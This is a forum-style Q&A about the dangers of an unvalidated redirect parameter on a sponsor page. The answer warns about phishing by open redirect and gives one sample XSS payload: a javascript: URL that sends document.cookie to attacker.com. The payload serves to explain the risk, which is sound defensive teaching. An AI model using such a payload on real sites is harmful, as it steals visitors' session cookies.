I have a webpage that redirects to another webpage like this:
http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html
Then the Sponsor.php page displays an ad with a link saying "Continue to your page" that links to the passed in RedirectPage. Are there security/spoofing issues that could come from this? What is the best way to handle this? (note that the user is not logged in to either site)
It's a big problem. If I send you a link that looks like this:
http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14
You're going to think "Oh, CNN, that's a legit site", and you'll open it and click the 'Continue to Your Page' link. And then you'll be on one of the nastiest porn sites on the net and it'll have a giant booming male voice announcing to all your co-workers "Hot Damn I Want to !@$@#$ Your !(&¤&^$§ until I can't ¡⌐^(!#~~&$^#!@$!!" and you'll have to explain to your boss "I thought it was CNN!"
The hole here is your reputation. Blind redirects like this are dangerous.
And that's just one hole. How about this?
http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie
Now I've XSS-ed your site and stolen your user's cookies. Sure, you say there's no login info, but how about session data? Or when you add a login later, or someone else in your company uses this page a year later where users are logged in.